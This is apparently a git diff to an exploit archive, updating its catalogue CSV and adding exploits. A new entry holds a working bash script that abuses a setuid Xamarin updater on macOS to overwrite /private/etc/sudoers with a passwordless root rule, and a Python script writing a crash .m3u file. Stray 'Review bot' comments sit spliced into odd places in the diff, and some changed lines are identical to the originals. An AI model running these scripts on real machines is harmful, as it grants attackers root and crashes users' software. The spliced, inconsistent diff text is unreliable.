diff --git a/files.csv b/files.csv
index 8822a1c38..2f4ace62b 100644
--- a/files.csv
+++ b/files.csv
@@ -104,7 +104,7 @@ id,file,description,date,author,platform,type,port
 667,platforms/windows/dos/667.c,"Jana Server 2.4.4 - (http/pna) Denial of Service",2004-11-30,"Luigi Auriemma",windows,dos,0
 671,platforms/windows/dos/671.c,"Neverwinter Nights special - Fake Players Denial of Service",2004-12-01,"Luigi Auriemma",windows,dos,0
 672,platforms/windows/dos/672.c,"Kreed 1.05 - Format String / Denial of Service",2004-12-02,"Luigi Auriemma",windows,dos,0
-677,platforms/windows/dos/677.txt,"GetRight 5.2a - Skin File (.grs) Buffer Overflow",2004-12-06,ATmaCA,windows,dos,0
+677,platforms/windows/dos/677.txt,"GetRight 5.2a - '.grs' Skin File Buffer Overflow",2004-12-06,ATmaCA,windows,dos,0
 679,platforms/windows/dos/679.c,"Battlefield 1942 1.6.19 + Vietnam 1.2 - Broadcast Client Crash",2004-12-07,"Luigi Auriemma",windows,dos,0
 682,platforms/windows/dos/682.c,"Codename Eagle 1.42 - Socket Unreacheable Denial of Service",2004-12-13,"Luigi Auriemma",windows,dos,0
 683,platforms/windows/dos/683.c,"Lithtech Engine (new protocol) - Socket Unreacheable Denial of Service",2004-12-13,"Luigi Auriemma",windows,dos,0
@@ -5639,6 +5639,7 @@ id,file,description,date,author,platform,type,port
 42411,platforms/windows/dos/42411.py,"Solarwinds Kiwi Syslog 9.6.1.6 - Denial of Service",2017-08-01,"Guillaume Kaddouch",windows,dos,0
 42433,platforms/linux/dos/42433.txt,"WildMIDI 0.4.2 - Multiple Vulnerabilities",2017-08-08,qflb.wu,linux,dos,0
 42445,platforms/win_x86-64/dos/42445.html,"Microsoft Edge 38.14393.1066.0 - 'textarea.defaultValue' Memory Disclosure",2017-08-10,"Google Security Research",win_x86-64,dos,0
+42451,platforms/windows/dos/42451.py,"Tomabo MP4 Converter 3.19.15 - Denial of Service",2017-08-13,"Andy Bowden",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -9178,6 +9179,7 @@ id,file,description,date,author,platform,type,port
 42429,platforms/windows/local/42429.py,"Microsoft Windows - '.LNK' Shortcut File Code Execution",2017-08-06,nixawk,windows,local,0
 42432,platforms/windows/local/42432.cpp,"Microsoft Windows 7 SP1 x86 - GDI Palette Objects Local Privilege Escalation (MS17-017)",2017-07-19,Saif,windows,local,0
 42435,platforms/win_x86-64/local/42435.txt,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) (2)",2017-08-08,SensePost,win_x86-64,local,0
+42454,platforms/macos/local/42454.txt,"Xamarin Studio for Mac 6.2.1 (build 3)/6.3 (build 863) - Privilege Escalation",2017-08-14,Securify,macos,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -9360,7 +9362,7 @@ id,file,description,date,author,platform,type,port
 409,platforms/bsd/remote/409.c,"BSD TelnetD - Remote Command Execution (1)",2001-06-09,Teso,bsd,remote,23
 413,platforms/linux/remote/413.c,"MusicDaemon 0.0.3 - Remote Denial of Service / /etc/shadow Stealer (2)",2004-08-24,Tal0n,linux,remote,0
 416,platforms/linux/remote/416.c,"Hafiye 1.0 - Remote Terminal Escape Sequence Injection",2004-08-25,"Serkan Akpolat",linux,remote,0
-418,platforms/windows/remote/418.c,"Winamp 5.04 - Skin File (.wsz) Remote Code Execution",2004-08-25,"Petrol Designs",windows,remote,0
+418,platforms/windows/remote/418.c,"Winamp 5.04 - '.wsz' Skin File Remote Code Execution",2004-08-25,"Petrol Designs",windows,remote,0
 421,platforms/windows/remote/421.c,"Gaucho 1.4 - Mail Client Buffer Overflow",2004-08-27,"Tan Chew Keong",windows,remote,0
 424,platforms/linux/remote/424.c,"Citadel/UX - Remote Buffer Overflow",2004-08-30,Nebunu,linux,remote,504
 425,platforms/hardware/remote/425.c,"D-Link DCS-900 Camera - Remote IP Address Changer Exploit",2004-08-31,anonymous,hardware,remote,0
@@ -16413,7 +16415,7 @@ id,file,description,date,author,platform,type,port
 659,platforms/cgi/webapps/659.txt,"Alex Heiphetz Group eZshopper - 'loadpage.cgi' Directory Traversal",2004-11-25,"Zero X",cgi,webapps,0
 673,platforms/php/webapps/673.pl,"phpBB 2.0.10 - Remote Command Execution (CGI)",2004-12-03,ZzagorR,php,webapps,0
 676,platforms/php/webapps/676.c,"phpBB 1.0.0/2.0.10 - 'admin_cash.php' Remote Exploit",2004-12-05,evilrabbi,php,webapps,0
-697,platforms/php/webapps/697.c,"PHP 4.3.9 + phpBB 2.x - 'Unserialize()' Remote Exploit (Compiled)",2004-12-17,overdose,php,webapps,0
+697,platforms/php/webapps/697.c,"PHP 4.3.9 + phpBB 2.x - 'Unserialize()' Remote Exploit",2004-12-17,overdose,php,webapps,0
 702,platforms/php/webapps/702.pl,"phpBB - highlight Arbitrary File Upload (Santy.A)",2004-12-22,anonymous,php,webapps,0
 703,platforms/php/webapps/703.pl,"phpMyChat 0.14.5 - Remote Improper File Permissions Exploit",2004-12-22,sysbug,php,webapps,0
 704,platforms/php/webapps/704.pl,"e107 - 'include()' Remote Exploit",2004-12-22,sysbug,php,webapps,80
@@ -25575,7 +25577,7 @@ id,file,description,date,author,platform,type,port
 17921,platforms/asp/webapps/17921.txt,"GotoCode Online Bookstore - Multiple Vulnerabilities",2011-10-03,"Nathaniel Carew",asp,webapps,0
 17922,platforms/cgi/webapps/17922.rb,"CA Total Defense Suite - reGenerateReports Stored procedure SQL Injection (Metasploit)",2011-10-02,Metasploit,cgi,webapps,0
 17924,platforms/jsp/webapps/17924.pl,"JBoss & JMX Console - Misconfigured Deployment Scanner",2011-10-03,y0ug,jsp,webapps,0
-17925,platforms/php/webapps/17925.txt,"Concrete5 < 5.4.2.1 - Multiple Vulnerabilities",2011-10-04,"Ryan Dewhurst",php,webapps,0
+17925,platforms/php/webapps/17925.txt,"Concrete5 CMS < 5.4.2.1 - Multiple Vulnerabilities",2011-10-04,"Ryan Dewhurst",php,webapps,0
 17926,platforms/php/webapps/17926.txt,"Easy Hosting Control Panel - Admin Authentication Bypass",2011-10-04,Jasman,php,webapps,0
 17927,platforms/php/webapps/17927.txt,"CF Image Hosting Script 1.3.82 - File Disclosure",2011-10-04,bd0rk,php,webapps,0
 18033,platforms/php/webapps/18033.txt,"Joomla! Component 'com_yjcontactus' - Local File Inclusion",2011-10-25,MeGo,php,webapps,0
@@ -32512,7 +32514,7 @@ id,file,description,date,author,platform,type,port
 31733,platforms/ios/webapps/31733.txt,"My PDF Creator & DE DM 1.4 iOS - Multiple Vulnerabilities",2014-02-18,Vulnerability-Lab,ios,webapps,50496
 32240,platforms/php/webapps/32240.txt,"Freeway 1.4.1 - Multiple Input Validation Vulnerabilities",2008-08-13,"Digital Security Research Group",php,webapps,0
 31734,platforms/php/webapps/31734.txt,"Pina CMS - Multiple Vulnerabilities",2014-02-18,"Shadman Tanjim",php,webapps,80
-31735,platforms/php/webapps/31735.txt,"Concrete5 5.6.2.1 - 'index.php' 'cID' Parameter SQL Injection",2014-02-18,killall-9,php,webapps,80
+31735,platforms/php/webapps/31735.txt,"Concrete5 CMS 5.6.2.1 - 'index.php' 'cID' Parameter SQL Injection",2014-02-18,killall-9,php,webapps,80
 31738,platforms/php/webapps/31738.py,"Open Web Analytics 1.5.4 - (owa_email_address Parameter) SQL Injection",2014-02-18,"Dana James Traversie",php,webapps,0
 31739,platforms/php/webapps/31739.txt,"TLM CMS 1.1 - 'index.php' Multiple SQL Injections",2008-05-05,ZoRLu,php,webapps,0
 31740,platforms/php/webapps/31740.html,"LifeType 1.2.8 - 'admin.php' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0
@@ -35757,7 +35759,7 @@ id,file,description,date,author,platform,type,port
 37100,platforms/php/webapps/37100.txt,"Waylu CMS - 'products_xx.php' SQL Injection / HTML Injection",2012-04-20,TheCyberNuxbie,php,webapps,0
 37101,platforms/php/webapps/37101.txt,"Joomla! Component CCNewsLetter 1.0.7 - 'id' Parameter SQL Injection",2012-04-23,E1nzte1N,php,webapps,0
 37102,platforms/php/webapps/37102.txt,"Joomla! Component 'com_videogallery' - Local File Inclusion / SQL Injection",2012-04-24,KedAns-Dz,php,webapps,0
-37103,platforms/php/webapps/37103.txt,"Concrete5 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0
+37103,platforms/php/webapps/37103.txt,"Concrete5 CMS 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0
 37104,platforms/php/webapps/37104.txt,"gpEasy 2.3.3 - 'jsoncallback' Parameter Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0
 37105,platforms/php/webapps/37105.txt,"Quick.CMS 4.0 - 'p' Parameter Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0
 37106,platforms/php/webapps/37106.txt,"WordPress Plugin Video Gallery 2.8 - Arbitrary Mail Relay",2015-05-26,"Claudio Viviani",php,webapps,80
@@ -37246,7 +37248,7 @@ id,file,description,date,author,platform,type,port
 40041,platforms/php/webapps/40041.txt,"Symantec Endpoint Protection Manager 12.1 - Multiple Vulnerabilities",2016-06-29,hyp3rlinx,php,webapps,8445
 40042,platforms/php/webapps/40042.php,"WordPress Plugin Ultimate Membership Pro 3.3 - SQL Injection",2016-06-29,wp0Day.com,php,webapps,80
 40044,platforms/cgi/webapps/40044.html,"Ubiquiti Administration Portal - Remote Command Execution (via Cross-Site Request Forgery)",2016-06-29,KoreLogic,cgi,webapps,443
-40045,platforms/php/webapps/40045.txt,"Concrete5 5.7.3.1 - 'Application::dispatch' Method Local File Inclusion",2016-06-29,"Egidio Romano",php,webapps,80
+40045,platforms/php/webapps/40045.txt,"Concrete5 CMS 5.7.3.1 - 'Application::dispatch' Method Local File Inclusion",2016-06-29,"Egidio Romano",php,webapps,80
 40092,platforms/php/webapps/40092.txt,"Beauty Parlour & SPA Saloon Management System - Blind SQL Injection",2016-07-11,"Yakir Wizman",php,webapps,80
 40093,platforms/php/webapps/40093.txt,"Clinic Management System - Blind SQL Injection",2016-07-11,"Yakir Wizman",php,webapps,80
 40050,platforms/jsp/webapps/40050.txt,"XpoLog Center 6 - Remote Command Execution / Cross-Site Request Forgery",2016-07-04,LiquidWorm,jsp,webapps,30303
@@ -37997,6 +37999,7 @@ id,file,description,date,author,platform,type,port
 41698,platforms/linux/webapps/41698.rb,"WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
 41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0
 42058,platforms/jsp/webapps/42058.py,"NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion",2017-05-24,f3ci,jsp,webapps,0
+42453,platforms/windows/webapps/42453.txt,"Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross Site Scripting",2017-08-14,"Benjamin Lee",windows,webapps,0
 41899,platforms/multiple/webapps/41899.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'PrototypeMap::createEmptyStructure' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps,0
 41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
 41717,platforms/php/webapps/41717.txt,"Gr8 Gallery Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
@@ -38067,7 +38070,7 @@ id,file,description,date,author,platform,type,port
 41881,platforms/multiple/webapps/41881.html,"agorum core Pro 7.8.1.4-251 - Cross-Site Request Forgery",2017-04-13,"SySS GmbH",multiple,webapps,0
 41882,platforms/multiple/webapps/41882.html,"agorum core Pro 7.8.1.4-251 - Persistent Cross-Site Scripting",2017-04-13,"SySS GmbH",multiple,webapps,0
 41884,platforms/php/webapps/41884.rb,"Alienvault OSSIM/USM 5.3.4/5.3.5 - Remote Command Execution (Metasploit)",2017-04-13,"Peter Lapp",php,webapps,0
-41885,platforms/php/webapps/41885.txt,"Concrete5 8.1.0 - 'Host' Header Injection",2017-04-14,hyp3rlinx,php,webapps,0
+41885,platforms/php/webapps/41885.txt,"Concrete5 CMS 8.1.0 - 'Host' Header Injection",2017-04-14,hyp3rlinx,php,webapps,0
 41890,platforms/php/webapps/41890.txt,"Mantis Bug Tracker 1.3.0/2.3.0 - Password Reset",2017-04-16,hyp3rlinx,php,webapps,0
 41900,platforms/multiple/webapps/41900.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'operationSpreadGeneric' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps,0
 41918,platforms/php/webapps/41918.txt,"FlySpray 1.0-rc4 - Cross-Site Scripting / Cross-Site Request Forgery",2017-04-25,"Cyril Vallicari",php,webapps,0
@@ -38239,14 +38242,14 @@ id,file,description,date,author,platform,type,port
 42431,platforms/php/webapps/42431.txt,"WordPress Plugin Easy Modal 2.0.17 - SQL Injection",2017-08-07,defensecode,php,webapps,80
 42434,platforms/hardware/webapps/42434.py,"Synology Photo Station 6.7.3-3432 / 6.3-2967 - Remote Code Execution",2017-08-08,"Kacper Szurek",hardware,webapps,0
 42436,platforms/jsp/webapps/42436.py,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - User Enumeration",2017-08-09,LiquidWorm,jsp,webapps,0
-42437,platforms/jsp/webapps/42437.html,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - Cross-Site Scripting / Cross-Site Request",2017-08-09,LiquidWorm,jsp,webapps,0
+42437,platforms/jsp/webapps/42437.html,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - Cross-Site Scripting / Cross-Site Request Forgery",2017-08-09,LiquidWorm,jsp,webapps,0
 42438,platforms/jsp/webapps/42438.txt,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - Directory Traversal",2017-08-09,LiquidWorm,jsp,webapps,0
 42439,platforms/jsp/webapps/42439.txt,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - Server-Side Request Forgery",2017-08-09,LiquidWorm,jsp,webapps,0
 42440,platforms/php/webapps/42440.txt,"WebFile Explorer 1.0 - Arbitrary File Download",2017-08-09,"Ihsan Sencan",php,webapps,0
 42441,platforms/php/webapps/42441.txt,"ImageBay 1.0 - SQL Injection",2017-08-10,"Ihsan Sencan",php,webapps,0
 42442,platforms/php/webapps/42442.txt,"GIF Collection 2.0 - SQL Injection",2017-08-10,"Ihsan Sencan",php,webapps,0
 42443,platforms/php/webapps/42443.txt,"Piwigo Plugin User Tag 0.9.0 - Cross-Site Scripting",2017-08-10,"Touhid M.Shaikh",php,webapps,0
-42444,platforms/windows/webapps/42444.txt,"Red-Gate SQL Monitor < 3.10/4.2 - Authentication Bypass",2017-08-10,"Paul Taylor",windows,webapps,0
+42444,platforms/windows/webapps/42444.txt,"Red-Gate SQL Monitor < 3.10 / 4.2 - Authentication Bypass",2017-08-10,"Paul Taylor",windows,webapps,0
 42446,platforms/php/webapps/42446.txt,"DeWorkshop 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0
 42447,platforms/php/webapps/42447.txt,"De-Journal 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0
 42448,platforms/php/webapps/42448.txt,"De-Tutor 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/linux/remote/3021.txt b/platforms/linux/remote/3021.txt
index 756b172d6..602376da7 100755
--- a/platforms/linux/remote/3021.txt
+++ b/platforms/linux/remote/3021.txt
@@ -2,6 +2,6 @@
 # solareclipse at phreedom dot org
 # GPG key ID: E36B11B7
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3021.tar.gz (12262006-proftpd-not-pro-enough.tar.gz)
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3021.tar.gz (12262006-proftpd-not-pro-enough.tar.gz)
 # milw0rm.com [2003-10-15]
diff --git a/platforms/linux/remote/609.txt b/platforms/linux/remote/609.txt
index 95326c65f..7d78bde96 100755
--- a/platforms/linux/remote/609.txt
+++ b/platforms/linux/remote/609.txt
@@ -1,4 +1,4 @@
 Download:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/609.tar.gz (ximage_zgv.tar.gz)
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/609.tar.gz (ximage_zgv.tar.gz)
 # milw0rm.com [2004-10-28]
diff --git a/platforms/macos/local/42454.txt b/platforms/macos/local/42454.txt
new file mode 100755
index 000000000..6872dcdb8
--- /dev/null
+++ b/platforms/macos/local/42454.txt
@@ -0,0 +1,38 @@
+Source: https://www.securify.nl/advisory/SFY20170403/xamarin-studio-for-mac-api-documentation-update-affected-by-local-privilege-escalation.html
+
+Abstract
+
+Xamarin Studio is an Integrated Development Environment (IDE) used to create iOS, Mac and Android applications. Xamarin Studio supports developments in C# and F# (by default). The API documentation update mechanism of Xamarin Studio for Mac is installed as setuid root. This update mechanism contains several flaws that could be leveraged by a local attacker to gain elevated (root) privileges.
+
+Tested versions
+
+This issue was successfully verified on Xamarin Studio for Mac version 6.2.1 (build 3) and version 6.3 (build 863).
+
+Fix
+
+Microsoft released a new version of Xamarin.iOS that addresses this issue:
+- Security update for the elevation of privilege vulnerability for Xamarin.iOS: August 14, 2017 (4037359)
+
+#!/bin/bash
+# WARNING: this scripts overwrites ~/.curlrc and /private/etc/sudoers (when successful)
+#target=/Library/Frameworks/Xamarin.iOS.framework/Versions/10.6.0.10/share/doc/MonoTouch/apple-doc-wizard
+target=/Library/Frameworks/Xamarin.iOS.framework/Versions/10.8.0.175/share/doc/MonoTouch/apple-doc-wizard
+rm -rf ~/Library/Developer/Shared/Documentation/DocSets
+
+cat << __EOF > /private/tmp/sudoers
+%everyone ALL=(ALL) NOPASSWD: ALL
+__EOF
+
+cat << __EOF > ~/.curlrc
+url=file:///private/tmp/sudoers
+output=/private/etc/sudoers
+__EOF
+
+echo
+echo "*** press CRL+C when the download starts ***"
+$target
+echo
+
+sudo -- sh -c 'rm -rf /private/tmp/ios-docs-download.*; su -'
+
+rm -f /private/tmp/sudoers ~/.curlrc
diff --git a/platforms/multiple/dos/1820.txt b/platforms/multiple/dos/1820.txt
index 1ea60b232..4ccbac64d 100755
--- a/platforms/multiple/dos/1820.txt
+++ b/platforms/multiple/dos/1820.txt
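Review bot: The `# WARNING` comment on the embedded script understates what it changes: the script also deletes `~/Library/Developer/Shared/Documentation/DocSets`, and the closing `rm -f /private/tmp/sudoers ~/.curlrc` removes only the two staging files, so the `%everyone ALL=(ALL) NOPASSWD: ALL` rule written into `/private/etc/sudoers` stays in place after the script exits. Anyone reproducing this in a lab VM must restore sudoers by hand, and the comment should say so, e.g. `# WARNING: deletes ~/Library/Developer/Shared/Documentation/DocSets and overwrites ~/.curlrc and /private/etc/sudoers; the sudoers change is NOT reverted by the cleanup at the end`. The same line also has a typo, `this scripts` should read `this script`.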
@@ -1,5 +1,5 @@
 # netPanzer 0.8 rev 952 (frameNum) Server Terminiation Exploit
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1820.zip (05232006-panza.zip)
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1820.zip (05232006-panza.zip)
 # milw0rm.com [2006-05-23]
diff --git a/platforms/multiple/dos/2587.txt b/platforms/multiple/dos/2587.txt
index 9480f6bb3..a7487162e 100755
--- a/platforms/multiple/dos/2587.txt
+++ b/platforms/multiple/dos/2587.txt
@@ -3,6 +3,6 @@ Damian Put
 pucik[at]gazeta.pl
 pucik[@]overflow.pl
 http://overflow.pl
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2587.exe.bz2 (10172006-clam_petite_heap.exe.bz2
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2587.exe.bz2 (10172006-clam_petite_heap.exe.bz2
 # milw0rm.com [2006-10-17]
diff --git a/platforms/multiple/dos/2911.txt b/platforms/multiple/dos/2911.txt
index 890a21ab7..aee08869c 100755
--- a/platforms/multiple/dos/2911.txt
+++ b/platforms/multiple/dos/2911.txt
@@ -1,5 +1,5 @@
 Sophos Antivirus CHM Chunk Name Length Memory Corruption Vulnerability
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2911.chm (12092006-sophos_namelen.chm)
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2911.chm (12092006-sophos_namelen.chm)
 # milw0rm.com [2006-12-10]
diff --git a/platforms/multiple/remote/1791.patch b/platforms/multiple/remote/1791.patch
index 3cd922e9a..4bf8b208f 100755
--- a/platforms/multiple/remote/1791.patch
+++ b/platforms/multiple/remote/1791.patch
@@ -15,6 +15,6 @@ xx vnc-4_1_1-unixsrc.bl4ck/common/rfb/CConnection.cxx os->flush(); vlog.debug("Choosing security type %s(%d)",secTypeName(secType),secType); }
-Compiled: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1791.rar (05162006-BL4CK-vncviewer-authbypass.rar)
+Compiled: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1791.rar (05162006-BL4CK-vncviewer-authbypass.rar)
diff --git a/platforms/multiple/remote/1799.txt b/platforms/multiple/remote/1799.txt
index 638c9dc5a..782c0b444 100755
--- a/platforms/multiple/remote/1799.txt
+++ b/platforms/multiple/remote/1799.txt
@@ -1,8 +1,8 @@
 class101 - http://heapoverflow.com
 RealVNC 4.1.0 - 4.1.1 (VNC Null Authentication) Vulnerability Scanners
 ---------------------------------------------------------------------
-windows: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1799-1.rar (05172006-VNC_bypauth-win32.rar)
-linux: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1799-2.rar (05172006-VNC_bypauth-linux.tar.gz)
+windows: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1799-1.rar (05172006-VNC_bypauth-win32.rar)
+linux: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1799-2.rar (05172006-VNC_bypauth-linux.tar.gz)
 comments: http://heapoverflow.com/viewtopic.php?p=1729
 --------------------------------------------------------------------
diff --git a/platforms/multiple/remote/349.txt b/platforms/multiple/remote/349.txt
index 3a9d1cc18..4ba303ec7 100755
--- a/platforms/multiple/remote/349.txt
+++ b/platforms/multiple/remote/349.txt
@@ -1,3 +1,3 @@
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/349.tgz (x2.tgz)
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/349.tgz (x2.tgz)
 # milw0rm.com [2002-05-01]
diff --git a/platforms/php/webapps/697.c b/platforms/php/webapps/697.c
index 9616b4a28..994b9e256 100755
--- a/platforms/php/webapps/697.c
+++ b/platforms/php/webapps/697.c
@@ -1,4 +1,4 @@
-// Compiled version: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/697.rar (phpbbmemorydump.rar)
+// Compiled version: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/697.rar (phpbbmemorydump.rar)
 // Source serv.cpp is at the bottom of the page - str0ke
 // Notes from author:
diff --git a/platforms/windows/dos/1615.txt b/platforms/windows/dos/1615.txt
index 730275cf0..af883e1f0 100755
--- a/platforms/windows/dos/1615.txt
+++ b/platforms/windows/dos/1615.txt
@@ -1,4 +1,4 @@
-# Full archive at https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1615.rar (excel_03262006.rar)
+# Full archive at https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1615.rar (excel_03262006.rar)
 Topic : Microsoft Office 2002 - Excel/Powerpoint/Word.. 10.0.2614.0 => 11.0.5612.0
 Date : 02/12/2006
diff --git a/platforms/windows/dos/1783.txt b/platforms/windows/dos/1783.txt
index c27eb9390..2884452dd 100755
--- a/platforms/windows/dos/1783.txt
+++ b/platforms/windows/dos/1783.txt
@@ -1,5 +1,5 @@
 # Genecys <= 0.2 (BoF/NULL pointer) Denial of Service Exploit
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1783.zip (05132006-genecysbof.zip)
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1783.zip (05132006-genecysbof.zip)
 # milw0rm.com [2006-05-14]
diff --git a/platforms/windows/dos/1784.txt b/platforms/windows/dos/1784.txt
index 135cc6679..dc67195d2 100755
--- a/platforms/windows/dos/1784.txt
+++ b/platforms/windows/dos/1784.txt
@@ -1,5 +1,5 @@
 # Raydium <= SVN 309 Multiple Remote Vulnerabilities Exploit
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1784.zip (05132006-raydiumx.zip)
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1784.zip (05132006-raydiumx.zip)
diff --git a/platforms/windows/dos/3690.txt b/platforms/windows/dos/3690.txt
index 41df29480..d0b2b02c4 100755
--- a/platforms/windows/dos/3690.txt
+++ b/platforms/windows/dos/3690.txt
@@ -26,7 +26,7 @@ file613-1.doc - Word 2007 CPU exhaustion DOS + ding - CPU shoots up to 100 %, a
 These files can be found at http://www.offensive-security.com/0day/0day.tar.gz
-backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3690.tar.gz (04092007-0day.tar.gz)
+backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3690.tar.gz (04092007-0day.tar.gz)
 Be safe,
diff --git a/platforms/windows/dos/4121.txt b/platforms/windows/dos/4121.txt
index 160cb3842..21f7b9e9c 100755
--- a/platforms/windows/dos/4121.txt
+++ b/platforms/windows/dos/4121.txt
@@ -4,6 +4,6 @@ http://www.ph4nt0m.org
 Tested on: Full Patched Excel 2003 Sp2, CN
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4121.zip (06272007-2670.zip)
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4121.zip (06272007-2670.zip)
 # milw0rm.com [2007-06-27]
diff --git a/platforms/windows/dos/42451.py b/platforms/windows/dos/42451.py
new file mode 100755
index 000000000..bdc5afb0b
--- /dev/null
+++ b/platforms/windows/dos/42451.py
@@ -0,0 +1,20 @@
+#!/usr/bin/python
+
+# Exploit Title: Tomabo MP4 Converter DOS
+# Date: 13/08/17
+# Exploit Author: Andy Bowden
+# Vendor Homepage: http://www.tomabo.com/
+# Software Link: http://www.tomabo.com/mp4-converter/index.html
+# Version: 3.19.15
+# Tested on: Windows 7 x86
+# CVE : None
+
+#Generate a .m3u file using the python script and import it into the MP4 Converter.
+
+file = "crash.m3u"
+
+buffer = "A" * 550000
+
+f = open(file, "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/platforms/windows/dos/677.txt b/platforms/windows/dos/677.txt
index 2f9f8c5be..ac107a2b8 100755
--- a/platforms/windows/dos/677.txt
+++ b/platforms/windows/dos/677.txt
@@ -20,7 +20,7 @@ Solutions: There was no response. Exploit:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/677.grs (c_skin.grs)
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/677.grs (c_skin.grs)
 When you copy or click this link, getright automaticly download and try to load crafted skin and will trigger buffer overflow
diff --git a/platforms/windows/dos/770.txt b/platforms/windows/dos/770.txt
index 84cbd6311..76c3eee4d 100755
--- a/platforms/windows/dos/770.txt
+++ b/platforms/windows/dos/770.txt
@@ -15,7 +15,7 @@ will can cause the remote system to crash. --Uncompleted qtif image file header http://www.atmacasoft.com/exp/vuln.qtif.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/770.qtif (vuln.qtif)
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/770.qtif (vuln.qtif)
 00000000 0000 005E 6964 7363 0000 0056 6A70 6567 0000 0000 0000 0000 0000 0000 ...^idsc...Vjpeg............
 0000001C 6170 706C 0000 0000 0000 0200 0100 016D 0048 0000 0048 0000 0000 724D appl...........m.H...H....rM
diff --git a/platforms/windows/local/11199.txt b/platforms/windows/local/11199.txt
index e9dfbcc66..513971c8f 100755
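Review bot: `file` and `buffer` shadow two Python 2 builtins (the shebang is `#!/usr/bin/python`), and the handle from `f = open(file, "w")` is closed by hand, so an exception raised by `f.write` would leave it open. A context manager with non-shadowing names does the same job with less to get wrong: `with open(out_path, "w") as f:` / `    f.write(payload)`, after renaming the two module-level variables to `out_path` and `payload`. The file also ends without a trailing newline, which the diff flags with `\ No newline at end of file`.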
--- a/platforms/windows/local/11199.txt
+++ b/platforms/windows/local/11199.txt
@@ -1,5 +1,5 @@
 Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11199.zip (KiTrap0D.zip)
-EDB Note: Make sure to run "vdmallowed.exe" (pre-compiled) inside the subfolder.
